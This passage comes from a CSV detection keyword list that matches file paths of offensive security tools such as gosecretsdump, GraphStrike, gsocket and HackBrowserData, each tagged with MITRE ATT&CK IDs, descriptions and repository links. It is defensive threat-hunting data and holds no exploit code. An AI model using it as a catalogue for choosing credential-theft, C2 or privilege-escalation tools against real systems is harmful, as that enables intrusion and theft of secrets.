Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*/goldenPac.py*",".{0,1000}\/goldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/goMatrixC2.git*",".{0,1000}\/goMatrixC2\.git.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/go-mimikatz*",".{0,1000}\/go\-mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","598","103","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z" "*/GONET-Scanner/*",".{0,1000}\/GONET\-Scanner\/.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","79","20","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*/goPassGen.git*",".{0,1000}\/goPassGen\.git.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*/gopher-ls.nse*",".{0,1000}\/gopher\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/gophish.db*",".{0,1000}\/gophish\.db.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*/gophish/*",".{0,1000}\/gophish\/.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*/gorsair.go*",".{0,1000}\/gorsair\.go.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","837","74","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z" "*/go-secdump.git*",".{0,1000}\/go\-secdump\.git.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*/gosecretsdump*",".{0,1000}\/gosecretsdump.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/gosecretsdump.*",".{0,1000}\/gosecretsdump\..{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/gosecretsdump/*",".{0,1000}\/gosecretsdump\/.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/gosecretsdump_linux*",".{0,1000}\/gosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/gosecretsdump_mac*",".{0,1000}\/gosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/gosecretsdump_win*",".{0,1000}\/gosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/GoStompy.go*",".{0,1000}\/GoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" 
"*/Gotato.git*",".{0,1000}\/Gotato\.git.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*/gotato.go*",".{0,1000}\/gotato\.go.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*/goWMIExec.git*",".{0,1000}\/goWMIExec\.git.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*/goWMIExec_linux_*",".{0,1000}\/goWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*/goWMIExec_mac_*",".{0,1000}\/goWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*/goWMIExec_win_*",".{0,1000}\/goWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral 
Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*/goZulipC2.git*",".{0,1000}\/goZulipC2\.git.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/GPOddity.git*",".{0,1000}\/GPOddity\.git.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*/GPOddity/*",".{0,1000}\/GPOddity\/.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*/gpp_autologin.py*",".{0,1000}\/gpp_autologin\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/gpp_password.py*",".{0,1000}\/gpp_password\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/gpp-decrypt*",".{0,1000}\/gpp\-decrypt.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/gpsd-info.nse*",".{0,1000}\/gpsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/GraphRunner.git*",".{0,1000}\/GraphRunner\.git.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/GraphRunner.ps1*",".{0,1000}\/GraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/GraphRunner-main*",".{0,1000}\/GraphRunner\-main.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation 
tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/GraphSpy.git*",".{0,1000}\/GraphSpy\.git.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","1","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*/GraphSpy.py*",".{0,1000}\/GraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","1","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*/GraphStrike.cna*",".{0,1000}\/GraphStrike\.cna.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/GraphStrike.git*",".{0,1000}\/GraphStrike\.git.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/graphstrike.profile*",".{0,1000}\/graphstrike\.profile.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" 
"*/GraphStrike.py*",".{0,1000}\/GraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/GraphStrike-main/*",".{0,1000}\/GraphStrike\-main\/.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/GreatSCT/*",".{0,1000}\/GreatSCT\/.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/GreatSCT/GreatSCT*",".{0,1000}\/GreatSCT\/GreatSCT.{0,1000}","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is currently under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/greatsct-output*",".{0,1000}\/greatsct\-output.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Grouper2.exe*",".{0,1000}\/Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Grouper2.exe*",".{0,1000}\/Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/GruntHTTP.exe*",".{0,1000}\/GruntHTTP\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/gs-netcat ",".{0,1000}\/gs\-netcat\s","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to 
establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket.1*",".{0,1000}\/gsocket\.1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket.git*",".{0,1000}\/gsocket\.git.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket-ssl.h*",".{0,1000}\/gsocket\-ssl\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket-tor*",".{0,1000}\/gsocket\-tor.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket-util.c*",".{0,1000}\/gsocket\-util\.c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gs-sftp*",".{0,1000}\/gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gtfobin_update.py*",".{0,1000}\/gtfobin_update\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/gtfobins.go*",".{0,1000}\/gtfobins\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/gtfobins.py*",".{0,1000}\/gtfobins\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/gtfonow.py*",".{0,1000}\/gtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/guervild/BOFs*",".{0,1000}\/guervild\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/guessed_emails.txt*",".{0,1000}\/guessed_emails\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*/gyaansastra/CVE-2022-0847*",".{0,1000}\/gyaansastra\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" "*/GzipB64.exe*",".{0,1000}\/GzipB64\.exe.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*/h8mail/*",".{0,1000}\/h8mail\/.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*/HackBrowserData*",".{0,1000}\/HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - 
TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*/hackerid.py*",".{0,1000}\/hackerid\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/hackingtool.git*",".{0,1000}\/hackingtool\.git.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 